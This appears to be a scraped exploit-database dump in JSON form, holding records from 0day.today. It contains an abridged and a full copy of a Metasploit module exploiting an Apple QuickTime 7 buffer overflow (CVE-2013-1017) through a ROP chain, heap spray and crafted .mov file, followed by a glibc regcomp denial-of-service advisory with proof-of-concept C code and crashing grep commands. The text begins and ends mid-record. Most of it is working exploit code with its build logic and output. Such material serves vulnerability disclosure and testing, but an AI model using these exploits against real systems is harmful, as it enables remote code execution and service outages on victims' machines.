[\r\n # All of the following addresses are from Quicktime.qts\r\n # RET = ADD ESP,280; RET, Nop = RET, Pop = POP ESP; RET\r\n [ 'Quicktime 7.7.3 with IE 8 on Windows XP SP3', {'Ret' => 0x66923467, 'Nop' => 0x6692346d, 'Pop' => 0x66849239} ],\r\n [ 'Quicktime 7.7.2 with IE 8 on Windows XP SP3', {'Ret' => 0x669211C7, 'Nop' => 0x669211CD, 'Pop' => 0x668C5B55} ],\r\n [ 'Quicktime 7.7.1 with IE 8 on Windows XP SP3', {'Ret' => 0x66920D67, 'Nop' => 0x66920D6D, 'Pop' => 0x66849259} ],\r\n [ 'Quicktime 7.7.0 with IE 8 on Windows XP SP3', {'Ret' => 0x66920BD7, 'Nop' => 0x66920BDD, 'Pop' => 0x668E963A} ]\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\x00\" # js_property_spray no like nilz\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'InitialAutoRunScript' => 'migrate -f'\r\n },\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"May 22 2013\"\r\n ))\r\n end\r\n \r\n def get_payload(t)\r\n p = ''\r\n \r\n rop =\r\n [\r\n 0x77c1e844, # POP EBP # RETN [msvcrt.dll]\r\n 0x77c1e844, # skip 4 bytes [msvcrt.dll]\r\n 0x77c4fa1c, # POP EBX # RETN [msvcrt.dll]\r\n 0xffffffff,\r\n 0x77c127e5, # INC EBX # RETN [msvcrt.dll]\r\n 0x77c127e5, # INC EBX # RETN [msvcrt.dll]\r\n 0x77c4e0da, # POP EAX # RETN [msvcrt.dll]\r\n 0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)\r\n 0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]\r\n 0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]\r\n 0x77c34fcd, # POP EAX # RETN [msvcrt.dll]\r\n 0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)\r\n 0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]\r\n 0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]\r\n 0x77c3048a, # POP EDI # RETN [msvcrt.dll]\r\n 0x77c47a42, # RETN (ROP NOP) [msvcrt.dll]\r\n 0x77c46efb, # POP ESI # RETN [msvcrt.dll]\r\n 0x77c2aacc, # JMP [EAX] [msvcrt.dll]\r\n 0x77c3b860, # POP EAX # RETN [msvcrt.dll]\r\n 0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]\r\n 0x77c12df9, # PUSHAD # RETN [msvcrt.dll]\r\n 0x77c35459 # ptr to 'push esp # ret ' [msvcrt.dll]\r\n ].pack(\"V*\")\r\n \r\n p << rop\r\n p << \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\r\n p << payload.encoded\r\n \r\n p\r\n end\r\n \r\n \r\n def targetable?(agent)\r\n if agent =~ /MSIE 8\\.0/ and agent =~ /Windows NT 5\\.1/\r\n return true\r\n elsif agent =~ /contype/\r\n # contype: a mov file request from Apple Quicktime\r\n return true\r\n end\r\n \r\n false\r\n end\r\n \r\n \r\n def get_html(t)\r\n js_p = ::Rex::Text.to_unescape(get_payload(t), ::Rex::Arch.endian(t.arch))\r\n fake_mov_name = rand_text_alpha(4) + \".mov\"\r\n html = %Q|\r\n <html>\r\n <head>\r\n <script>\r\n #{js_property_spray}\r\n \r\n var s = unescape(\"#{js_p}\");\r\n sprayHeap({shellcode:s});\r\n </script>\r\n </head>\r\n <body>\r\n <embed src=\"#{get_resource}/#{fake_mov_name}\" width=\"0\" height=\"0\"></embed>\r\n </body>\r\n </html>\r\n |\r\n \r\n html.gsub(/^\\t\\t/, '')\r\n end\r\n \r\n \r\n def on_request_uri(cli, request)\r\n agent = request.headers['User-Agent']\r\n print_status(\"Requesting: #{request.uri}\")\r\n \r\n unless targetable?(agent)\r\n print_error(\"Browser not supported, sending 404: #{agent}\")\r\n send_not_found(cli)\r\n return\r\n end\r\n \r\n print_status(\"Target selected as: #{target.name}\") if target\r\n \r\n if request.uri =~ /\\.mov$/\r\n print_status(\"Sending specially crafted .mov file\")\r\n send_response(cli, @exploit, { 'Content-Type' => 'application/octet-stream' })\r\n else\r\n html = get_html(target)\r\n send_response(cli, html, { 'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache' })\r\n end\r\n end\r\n \r\n def sort_bytes(data)\r\n data.map { |e| [e].pack('N').scan(/../).reverse.join }.join\r\n end\r\n \r\n def rop_nop(t)\r\n [t['Nop']].pack('V*') # Ret (QuickTime.qts)\r\n end\r\n \r\n def exploit\r\n buf = ''\r\n buf << rand_text_alpha(467) # 467 to align the pivot\r\n 10.times {\r\n buf << rop_nop(target)\r\n }\r\n buf << [\r\n target['Pop'], # POP ESP; RET (QuickTime.qts)\r\n 0x20302020 # Target value for ESP (our ROP payload)\r\n ].pack('V*')\r\n buf << rand_text_alpha(611 - buf.length) # Offset 611 to hit SE Handler\r\n buf << sort_bytes([target.ret]) # ADD ESP,280; RET (QuickTime.qts) - pivot\r\n buf << rand_text_alpha(658 - buf.length) # 658 bytes to pad up the mov file size\r\n \r\n # Quicktime File Format Specifications:\r\n # https://developer.apple.com/standards/qtff-2001.pdf\r\n mov = \"\\x00\\x00\\x06\\xDF\" # File size\r\n mov << \"moov\" # Movie atom\r\n mov << \"\\x00\\x00\\x06\\xD7\" # size (1751d)\r\n mov << \"rmra\" # Reference Movie atom\r\n mov << \"\\x00\\x00\\x06\\xCF\" # size (1743d)\r\n mov << \"rmda\" # rmda atom\r\n mov << \"\\x00\\x00\\x06\\xBF\" # size (1727d)\r\n mov << \"rdrf\" # Data reference atom\r\n mov << \"\\x00\\x00\\x00\\x00\" # size set to 0\r\n mov << \"alis\" # Data reference type: FS alias record\r\n mov << \"\\x00\\x00\\x06\\xAA\" # Size (1706d)\r\n mov << rand_text_alpha(8)\r\n mov << \"\\x00\\x00\\x06\\x61\" # Size (1633d)\r\n mov << rand_text_alpha(38)\r\n mov << \"\\x12\"\r\n mov << rand_text_alpha(81)\r\n mov << \"\\xFF\\xFF\"\r\n mov << rand_text_alpha(18)\r\n mov << \"\\x00\\x08\" # Size (8d)\r\n mov << rand_text_alpha(8)\r\n mov << \"\\x00\\x00\"\r\n mov << \"\\x00\\x08\" # Size (8d)\r\n mov << rand_text_alpha(8)\r\n mov << \"\\x00\\x00\"\r\n mov << \"\\x00\\x26\" # Size (38d)\r\n mov << rand_text_alpha(38)\r\n mov << \"\\x00\\x0F\\x00\\x0E\"\r\n mov << \"AA\" # Size (must be invalid)\r\n mov << rand_text_alpha(12)\r\n mov << \"\\x00\\x12\\x00\\x21\"\r\n mov << rand_text_alpha(36)\r\n mov << \"\\x00\"\r\n mov << \"\\x0F\\x33\"\r\n mov << rand_text_alpha(17)\r\n mov << \"\\x02\\xF4\" # Size (756h)\r\n mov << rand_text_alpha(756)\r\n mov << \"\\xFF\\xFF\\x00\\x00\\x00\"\r\n mov << buf\r\n \r\n @exploit = mov\r\n super\r\n end\r\nend\n\n# 0day.today [2018-04-09] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/21017"}, {"lastseen": "2018-01-11T01:21:20", "references": [], "edition": 2, "description": "This Metasploit module exploits a vulnerability found in Apple Quicktime. The flaw is triggered when Quicktime fails to properly handle the data length for certain atoms such as 'rdrf' or 'dref' in the Alis record, which may result a buffer overflow by loading a specially crafted .mov file, and allows arbitrary code execution under the context of the user.", "reporter": "metasploit", "published": "2013-07-19T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "type": "zdt", "title": "Apple Quicktime 7 Invalid Atom Length Buffer Overflow Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1017"], "modified": "2013-07-19T00:00:00", "id": "1337DAY-ID-21009", "href": "https://0day.today/exploit/description/21009", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit4 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Apple Quicktime 7 Invalid Atom Length Buffer Overflow\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability found in Apple Quicktime. The flaw is\r\n triggered when Quicktime fails to properly handle the data length for certain\r\n atoms such as 'rdrf' or 'dref' in the Alis record, which may result a buffer\r\n overflow by loading a specially crafted .mov file, and allows arbitrary\r\n code execution under the context of the user.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Jason Kratzer', # Original Discovery & PoC (overlapped finding), aka pyoor\r\n 'Tom Gallagher', # Original Discovery (overlapped)\r\n 'Paul Bates', # Original Discovery (overlapped)\r\n 'sinn3r' # Metasploit\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-1017' ],\r\n [ 'BID', '60097' ],\r\n [ 'URL', 'http://support.apple.com/kb/HT5770' ]\r\n ],\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n # All of the following addresses are from Quicktime.qts\r\n # RET = ADD ESP,280; RET, Nop = RET, Pop = POP ESP; RET\r\n [ 'Quicktime 7.7.3 with IE 8 on Windows XP SP3', {'Ret' => 0x66923467, 'Nop' => 0x6692346d, 'Pop' => 0x66849239} ],\r\n [ 'Quicktime 7.7.2 with IE 8 on Windows XP SP3', {'Ret' => 0x669211C7, 'Nop' => 0x669211CD, 'Pop' => 0x668C5B55} ],\r\n [ 'Quicktime 7.7.1 with IE 8 on Windows XP SP3', {'Ret' => 0x66920D67, 'Nop' => 0x66920D6D, 'Pop' => 0x66849259} ],\r\n [ 'Quicktime 7.7.0 with IE 8 on Windows XP SP3', {'Ret' => 0x66920BD7, 'Nop' => 0x66920BDD, 'Pop' => 0x668E963A} ]\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\x00\" # js_property_spray no like nilz\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'InitialAutoRunScript' => 'migrate -f'\r\n },\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"May 22 2013\"\r\n ))\r\n end\r\n\r\n def get_payload(t)\r\n p = ''\r\n\r\n rop =\r\n [\r\n 0x77c1e844, # POP EBP # RETN [msvcrt.dll]\r\n 0x77c1e844, # skip 4 bytes [msvcrt.dll]\r\n 0x77c4fa1c, # POP EBX # RETN [msvcrt.dll]\r\n 0xffffffff,\r\n 0x77c127e5, # INC EBX # RETN [msvcrt.dll]\r\n 0x77c127e5, # INC EBX # RETN [msvcrt.dll]\r\n 0x77c4e0da, # POP EAX # RETN [msvcrt.dll]\r\n 0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)\r\n 0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]\r\n 0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]\r\n 0x77c34fcd, # POP EAX # RETN [msvcrt.dll]\r\n 0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)\r\n 0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]\r\n 0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]\r\n 0x77c3048a, # POP EDI # RETN [msvcrt.dll]\r\n 0x77c47a42, # RETN (ROP NOP) [msvcrt.dll]\r\n 0x77c46efb, # POP ESI # RETN [msvcrt.dll]\r\n 0x77c2aacc, # JMP [EAX] [msvcrt.dll]\r\n 0x77c3b860, # POP EAX # RETN [msvcrt.dll]\r\n 0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]\r\n 0x77c12df9, # PUSHAD # RETN [msvcrt.dll]\r\n 0x77c35459 # ptr to 'push esp # ret ' [msvcrt.dll]\r\n ].pack(\"V*\")\r\n\r\n p << rop\r\n p << \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\r\n p << payload.encoded\r\n\r\n p\r\n end\r\n\r\n\r\n def targetable?(agent)\r\n if agent =~ /MSIE 8\\.0/ and agent =~ /Windows NT 5\\.1/\r\n return true\r\n elsif agent =~ /contype/\r\n # contype: a mov file request from Apple Quicktime\r\n return true\r\n end\r\n\r\n false\r\n end\r\n\r\n\r\n def get_html(t)\r\n js_p = ::Rex::Text.to_unescape(get_payload(t), ::Rex::Arch.endian(t.arch))\r\n fake_mov_name = rand_text_alpha(4) + \".mov\"\r\n html = %Q|\r\n <html>\r\n <head>\r\n <script>\r\n #{js_property_spray}\r\n\r\n var s = unescape(\"#{js_p}\");\r\n sprayHeap({shellcode:s});\r\n </script>\r\n </head>\r\n <body>\r\n <embed src=\"#{get_resource}/#{fake_mov_name}\" width=\"0\" height=\"0\"></embed>\r\n </body>\r\n </html>\r\n |\r\n\r\n html.gsub(/^\\t\\t/, '')\r\n end\r\n\r\n\r\n def on_request_uri(cli, request)\r\n agent = request.headers['User-Agent']\r\n print_status(\"Requesting: #{request.uri}\")\r\n\r\n unless targetable?(agent)\r\n print_error(\"Browser not supported, sending 404: #{agent}\")\r\n send_not_found(cli)\r\n return\r\n end\r\n\r\n print_status(\"Target selected as: #{target.name}\") if target\r\n\r\n if request.uri =~ /\\.mov$/\r\n print_status(\"Sending specially crafted .mov file\")\r\n send_response(cli, @exploit, { 'Content-Type' => 'application/octet-stream' })\r\n else\r\n html = get_html(target)\r\n send_response(cli, html, { 'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache' })\r\n end\r\n end\r\n\r\n def sort_bytes(data)\r\n data.map { |e| [e].pack('N').scan(/../).reverse.join }.join\r\n end\r\n\r\n def rop_nop(t)\r\n [t['Nop']].pack('V*') # Ret (QuickTime.qts)\r\n end\r\n\r\n def exploit\r\n buf = ''\r\n buf << rand_text_alpha(467) # 467 to align the pivot\r\n 10.times {\r\n buf << rop_nop(target)\r\n }\r\n buf << [\r\n target['Pop'], # POP ESP; RET (QuickTime.qts)\r\n 0x20302020 # Target value for ESP (our ROP payload)\r\n ].pack('V*')\r\n buf << rand_text_alpha(611 - buf.length) # Offset 611 to hit SE Handler\r\n buf << sort_bytes([target.ret]) # ADD ESP,280; RET (QuickTime.qts) - pivot\r\n buf << rand_text_alpha(658 - buf.length) # 658 bytes to pad up the mov file size\r\n\r\n # Quicktime File Format Specifications:\r\n # https://developer.apple.com/standards/qtff-2001.pdf\r\n mov = \"\\x00\\x00\\x06\\xDF\" # File size\r\n mov << \"moov\" # Movie atom\r\n mov << \"\\x00\\x00\\x06\\xD7\" # size (1751d)\r\n mov << \"rmra\" # Reference Movie atom\r\n mov << \"\\x00\\x00\\x06\\xCF\" # size (1743d)\r\n mov << \"rmda\" # rmda atom\r\n mov << \"\\x00\\x00\\x06\\xBF\" # size (1727d)\r\n mov << \"rdrf\" # Data reference atom\r\n mov << \"\\x00\\x00\\x00\\x00\" # size set to 0\r\n mov << \"alis\" # Data reference type: FS alias record\r\n mov << \"\\x00\\x00\\x06\\xAA\" # Size (1706d)\r\n mov << rand_text_alpha(8)\r\n mov << \"\\x00\\x00\\x06\\x61\" # Size (1633d)\r\n mov << rand_text_alpha(38)\r\n mov << \"\\x12\"\r\n mov << rand_text_alpha(81)\r\n mov << \"\\xFF\\xFF\"\r\n mov << rand_text_alpha(18)\r\n mov << \"\\x00\\x08\" # Size (8d)\r\n mov << rand_text_alpha(8)\r\n mov << \"\\x00\\x00\"\r\n mov << \"\\x00\\x08\" # Size (8d)\r\n mov << rand_text_alpha(8)\r\n mov << \"\\x00\\x00\"\r\n mov << \"\\x00\\x26\" # Size (38d)\r\n mov << rand_text_alpha(38)\r\n mov << \"\\x00\\x0F\\x00\\x0E\"\r\n mov << \"AA\" # Size (must be invalid)\r\n mov << rand_text_alpha(12)\r\n mov << \"\\x00\\x12\\x00\\x21\"\r\n mov << rand_text_alpha(36)\r\n mov << \"\\x00\"\r\n mov << \"\\x0F\\x33\"\r\n mov << rand_text_alpha(17)\r\n mov << \"\\x02\\xF4\" # Size (756h)\r\n mov << rand_text_alpha(756)\r\n mov << \"\\xFF\\xFF\\x00\\x00\\x00\"\r\n mov << buf\r\n\r\n @exploit = mov\r\n super\r\n end\r\nend\n\n# 0day.today [2018-01-10] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/21009"}, {"lastseen": "2018-03-01T23:45:34", "references": [], "edition": 2, "description": "Exploit for linux platform in category dos / poc", "reporter": "Maksymilian", "published": "2011-01-08T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "zdt", "title": "GNU libc/regcomp(3) Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": [], "modified": "2011-01-08T00:00:00", "id": "1337DAY-ID-15419", "href": "https://0day.today/exploit/description/15419", "sourceData": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n \r\n[ GNU libc/regcomp(3) Multiple Vulnerabilities ]\r\n \r\nAuthor: Maksymilian Arciemowicz\r\nhttp://securityreason.com/\r\nhttp://cxib.net/\r\nDate:\r\n- - Dis.: 01.10.2010\r\n- - Pub.: 07.01.2011\r\n \r\nCERT: VU#912279\r\nCVE:\r\nCVE-2010-4051\r\nCVE-2010-4052\r\n \r\nAffected (tested):\r\n- - Ubuntu 10.10\r\n- - Slackware 13\r\n- - Gentoo 18.10.2010\r\n- - FreeBSD 8.1 (grep(1))\r\n- - NetBSD 5.0.2 (grep(1))\r\n \r\nOriginal URL:\r\nhttp://securityreason.com/achievement_securityalert/93\r\n \r\nExploit for proftpd:\r\nhttp://cxib.net/stuff/proftpd.gnu.c\r\n \r\n \r\n- --- 0.Description ---\r\nThe GNU C library is used as the C library in the GNU system and most\r\nsystems with the Linux kernel.\r\n \r\n# define RE_DUP_MAX (0x7fff)\r\n \r\nregcomp() is used to compile a regular expression into a form that is\r\nsuitable for subsequent regexec() searches.\r\n \r\n \r\n- --- 1. RE_DUP_MAX overflow ---\r\nThe main problem exists in regcomp(3) function of GNU libc implementation.\r\nLet`s try understand..\r\n \r\n- ---\r\nint\r\nregcomp (preg, pattern, cflags)\r\nregex_t *__restrict preg;\r\nconst char *__restrict pattern;\r\nint cflags;\r\n{\r\n- ---\r\n \r\nif we use '{', token type will be OP_OPEN_DUP_NUM.\r\n \r\n- ---\r\n/* This function parse repetition operators like \"*\", \"+\", \"{1,3}\" etc.\r\n*/\r\n \r\nstatic bin_tree_t *\r\nparse_dup_op (bin_tree_t *elem, re_string_t *regexp, re_dfa_t *dfa,\r\nre_token_t *token, reg_syntax_t syntax, reg_errcode_t *err)\r\n{\r\nbin_tree_t *tree = NULL, *old_tree = NULL;\r\nint i, start, end, start_idx = re_string_cur_idx (regexp);\r\nre_token_t start_token = *token;\r\n \r\nif (token->type == OP_OPEN_DUP_NUM)\r\n{\r\nend = 0;\r\nstart = fetch_number (regexp, token, syntax); <===== CONVERT VALUE\r\n- ---\r\n \r\nlet`s see fetch_number =>\r\n \r\n- ---\r\nstatic int\r\nfetch_number (re_string_t *input, re_token_t *token, reg_syntax_t syntax)\r\n{\r\nint num = -1;\r\nunsigned char c;\r\nwhile (1)\r\n{\r\nfetch_token (token, input, syntax);\r\nc = token->opr.c;\r\nif (BE (token->type == END_OF_RE, 0))\r\nreturn -2;\r\nif (token->type == OP_CLOSE_DUP_NUM || c == ',')\r\nbreak;\r\nnum = ((token->type != CHARACTER || c < '0' || '9' < c || num == -2)\r\n? -2 : ((num == -1) ? c - '0' : num * 10 + c - '0'));\r\nnum = (num > RE_DUP_MAX) ? -2 : num;\r\n}\r\nreturn num;\r\n}\r\n- ---\r\n \r\nnow see regex.h to know, what value have RE_DUP_MAX\r\n \r\n- ---\r\n/* Maximum number of duplicates an interval can allow. Some systems\r\n(erroneously) define this in other header files, but we want our\r\nvalue, so remove any previous define. */\r\n# ifdef RE_DUP_MAX\r\n# undef RE_DUP_MAX\r\n# endif\r\n/* If sizeof(int) == 2, then ((1 << 15) - 1) overflows. */\r\n# define RE_DUP_MAX (0x7fff)\r\n#endif\r\n- ---\r\n \r\ncalc_eclosure_iter() will call to calc_eclosure_iter() match time. and\r\ncrash in malloc(3). Simple Recursion.\r\n \r\nso we can't use value bigger 0x7fff in {n,}. regcomp(3) should return ERROR\r\nif we use more that one time '{' token.\r\n \r\nThey are many vectors attack\r\n \r\ngrep(1):\r\n[email\u00a0protected]:~$ ls |grep -E \".*{10,}{10,}{10,}{10,}{10,}\"\r\nSegmentation fault\r\n \r\npgrep(1):\r\n[email\u00a0protected]:~$ pgrep \".*{10,}{10,}{10,}{10,}{10,}\"\r\nSegmentation fault\r\n \r\nbregex from bacula-director-common\r\n[email\u00a0protected]:~$ bregex -f glob-0day.c\r\nEnter regex pattern: .*{10,}{10,}{10,}{10,}{10,}\r\nSegmentation fault\r\n \r\nwhatis(1):\r\n[email\u00a0protected]:~$ whatis -r \".*{10,}{10,}{10,}{10,}{10,}\"\r\nSegmentation fault\r\n \r\nand more like proftpd.\r\n \r\nSimple crash for CVE-2010-4051\r\n(gdb) x/i $rip\r\n=> 0x7ffff7ad3ea2: mov %eax,0x50(%rsp)\r\n(gdb) x/i $eax\r\n0x2: Cannot access memory at address 0x2\r\n(gdb) x/i $rsp\r\n0x7fffff5fef90: Cannot access memory at address 0x7fffff5fef90\r\n(gdb) x/i 0x50($rsp)\r\nCannot access memory at address 0x7fffff5fef08\r\n \r\n \r\n#0 0x00007ffff7ad3ea2 in ?? () from /lib/libc.so.6\r\n#1 0x00007ffff7ad538e in malloc () from /lib/libc.so.6\r\n#2 0x00007ffff7b17d9b in ?? () from /lib/libc.so.6\r\n#3 0x00007ffff7b17f0b in ?? () from /lib/libc.so.6\r\n#4 0x00007ffff7b17f0b in ?? () from /lib/libc.so.6\r\n#5 0x00007ffff7b17f0b in ?? () from /lib/libc.so.6\r\n#6 0x00007ffff7b17f0b in ?? () from /lib/libc.so.6\r\n#7 0x00007ffff7b17f0b in ?? () from /lib/libc.so.6\r\n...\r\n \r\n- ---PoC1---\r\n#include <regex.h>\r\n \r\nint main(){\r\nregex_t preg;\r\n \r\n// char fmt[]=\".*{10,}{10,}{10,}{10,}\"; // CVE-2010-4052\r\nchar fmt[]=\".*{10,}{10,}{10,}{10,}{10,}\"; CVE-2010-4051\r\n \r\nregcomp (&preg, fmt, REG_EXTENDED);\r\n \r\nreturn 0;\r\n}\r\n- ---PoC1---\r\n \r\n- --- 2. Stack Exhausion ---\r\nThis issue, may be also use to Denial of Service by stack exhausion\r\n \r\n#ls |grep -E \".*{10,}{10,}{111111,}\"\r\n \r\n- ---PoC2---\r\n#include <regex.h>\r\n \r\nint\r\nmain ()\r\n{\r\nregex_t preg;\r\n \r\nchar fmt[]=\".*{10,}{10,}{10,}{10,}\"; // CVE-2010-4052\r\n// char fmt[]=\".*{10,}{10,}{10,}{10,}{10,}\"; // CVE-2010-4051\r\n \r\nregcomp (&preg, fmt, REG_EXTENDED);\r\n \r\nreturn 0;\r\n}\r\n- ---PoC2---\r\n \r\nSuch a pattern may lead to allocate a large memory area, or large execution\r\ntime\r\n \r\nAs we can read in vsftpd/HACKING\r\n \r\n- ---\r\n- do not use libc features that are \"complicated\"\r\nand may contain security holes. For example, you probably shouldn't\r\ntry to use regcomp() to compile an untrusted regular expression.\r\nRegular expressions are just too complicated, and there are many\r\ndifferent libc's out there.\r\n- ---\r\n \r\nThat's true. But the worst implementation of lib C is GNU. There is a huge\r\ndifference using proftpd on NetBSD and Linux\r\n \r\n \r\n- --- 3. Stack Exhausions ---\r\nStack Exhausions was found in GNU glibc.\r\n \r\n- ---PoC3---\r\n/bin/egrep \"/(.*+++++++++++++++++++++++++++++(\\w+))/im\" cx\r\n- ---PoC3---\r\n \r\nwhen more '+' that more allocated memory. But let's see next one\r\n \r\n- ---PoC4---\r\n[email\u00a0protected]:~$ ulimit -m 100000\r\n[email\u00a0protected]:~$ ulimit -v 200000\r\n[email\u00a0protected]:~$ /bin/egrep \"/(.*+++++++++++++++++++++++++++++(\\w+))/im\" cx\r\nSegmentation fault\r\n[email\u00a0protected]:~$\r\n- ---PoC4---\r\n \r\nthe same command like in PoC 3, fails.\r\n \r\n(gdb) r \"/(.*++++++++++++++++++(\\w+))/im\" cx\r\nStarting program: /bin/egrep \"/(.*++++++++++++++++++(\\w+))/im\" cx\r\n/bin/egrep: Memory exhausted\r\n \r\nAdd one \"+\" more\r\n \r\nProgram exited with code 02.\r\n(gdb) r \"/(.*+++++++++++++++++++(\\w+))/im\" cx\r\nThe program being debugged has been started already.\r\nStart it from the beginning? (y or n) y\r\n \r\nStarting program: /bin/egrep \"/(.*+++++++++++++++++++(\\w+))/im\" cx\r\n \r\nProgram received signal SIGSEGV, Segmentation fault.\r\n__libc_free (mem=0x7ffff720a010) at malloc.c:3709\r\n3709 if (chunk_is_mmapped(p)) /* release mmapped\r\nmemory. */\r\n(gdb) bt\r\n#0 __libc_free (mem=0x7ffff720a010) at malloc.c:3709\r\n#1 0x00007ffff7913431 in free_dfa_content (dfa=0x61f0c0) at regcomp.c:600\r\n#2 0x00007ffff7924e1c in re_compile_internal (preg=0x61f060, pattern=0x0,\r\n \r\nlength=140737488347176, syntax=<value optimized out>) at regcomp.c:823\r\n#3 0x00007ffff79256de in __re_compile_pattern (pattern=0x0,\r\nlength=<value optimized out>, bufp=0x7ffff720a010) at regcomp.c:231\r\n \r\n- ---malloc.c---\r\n...\r\nif (mem == 0) /* free(0) has no effect */\r\nreturn;\r\n \r\np = mem2chunk(mem);\r\n \r\n#if HAVE_MMAP\r\nif (chunk_is_mmapped(p))\r\n...\r\n- ---malloc.c---\r\n \r\nwhere\r\n#define mem2chunk(mem) ((mchunkptr)((char*)(mem) - 2*SIZE_SZ))\r\n \r\nmem variable (mem=0x7ffff720a010)\r\n \r\n(gdb) x/x 0x7ffff720a010\r\n0x7ffff720a010: 0x00\r\n \r\nor\r\n \r\n(gdb) x/x 0x7ffff720a010\r\n0x7ffff720a010: Cannot access memory at address 0x7ffff720a010\r\n \r\n(gdb) x/i $rip\r\n=> 0x7ffff78d2c2d <__libc_free+29>: mov -0x8(%rdi),%rsi\r\n(gdb) x/i $rdi\r\n0x7ffff7ed3010: Cannot access memory at address 0x7ffff7ed3010\r\n(gdb) x/i $rsi\r\n0x0: Cannot access memory at address 0x0\r\n \r\nor check this\r\n \r\n(gdb) r \"/(.*+++++++++++++++++++(\\w+))/im\" cx\r\nThe program being debugged has been started already.\r\nStart it from the beginning? (y or n) y\r\n \r\nStarting program: /bin/egrep \"/(.*+++++++++++++++++++(\\w+))/im\" cx\r\n \r\nProgram received signal SIGSEGV, Segmentation fault.\r\nparse_dup_op (regexp=0x7fffffffdf70, preg=<value optimized out>,\r\ntoken=0x7fffffffe010, syntax=<value optimized out>,\r\nnest=<value optimized out>, err=<value optimized out>) at\r\nregcomp.c:2547\r\n2547 if (elem->token.type == SUBEXP)\r\n(gdb) x/i $rip\r\n=> 0x7ffff7922644 <parse_expression+756>: cmpb $0x11,0x30(%r15)\r\n(gdb) x/i $r15\r\n0x0: Cannot access memory at address 0x0\r\n \r\nrax 0x0 0\r\nrbx 0x61f0c0 6418624\r\nrcx 0xffffffffffffffa8 -88\r\nrdx 0x0 0\r\nrsi 0x61f0c0 6418624\r\nrdi 0x0 0\r\nrbp 0x7fffffffe010 0x7fffffffe010\r\nrsp 0x7fffffffdb70 0x7fffffffdb70\r\nr8 0xffffffff 4294967295\r\nr9 0x0 0\r\nr10 0x4022 16418\r\nr11 0x246 582\r\nr12 0x7fffffffdf70 140737488346992\r\nr13 0x4730ae8 74648296\r\nr14 0xffffffff 4294967295\r\nr15 0x0 0\r\nrip 0x7ffff7922644 0x7ffff7922644 <parse_expression+756>\r\n \r\n#0 parse_dup_op (regexp=0x7fffffffdf70, preg=<value optimized out>,\r\ntoken=0x7fffffffe010, syntax=<value optimized out>,\r\nnest=<value optimized out>, err=<value optimized out>) at\r\nregcomp.c:2547\r\n#1 parse_expression (regexp=0x7fffffffdf70, preg=<value optimized out>,\r\ntoken=0x7fffffffe010, syntax=<value optimized out>,\r\nnest=<value optimized out>, err=<value optimized out>) at\r\nregcomp.c:2390\r\n#2 0x00007ffff792387e in parse_branch (regexp=0x0, preg=0x61f0c0,\r\ntoken=0x0,\r\nsyntax=18446744073709551528, nest=-1, err=0x0) at regcomp.c:2163\r\n#3 parse_reg_exp (regexp=0x0, preg=0x61f0c0, token=0x0,\r\nsyntax=18446744073709551528, nest=-1, err=0x0) at regcomp.c:2122\r\n \r\n \r\nif (BE (start > 0, 0))\r\n{\r\ntree = elem;\r\nfor (i = 2; i <= start; ++i)\r\n{\r\nelem = duplicate_tree (elem, dfa);\r\ntree = create_tree (dfa, tree, elem, CONCAT);\r\nif (BE (elem == NULL || tree == NULL, 0))\r\ngoto parse_dup_op_espace;\r\n}\r\n \r\nif (start == end)\r\nreturn tree;\r\n \r\n/* Duplicate ELEM before it is marked optional. */\r\nelem = duplicate_tree (elem, dfa);\r\nold_tree = tree;\r\n}\r\nelse\r\nold_tree = NULL;\r\n \r\nif (elem->token.type == SUBEXP) <=CRASH HERE\r\n \r\nThese vulnerabilities are not really dangerous. However, there is the\r\npossibility to use the DoS attack. An example might be an exploit for\r\nproftpd. Option 3 allows to exhaustion avaliable memory. In my opinion, the\r\nGNU should fix the 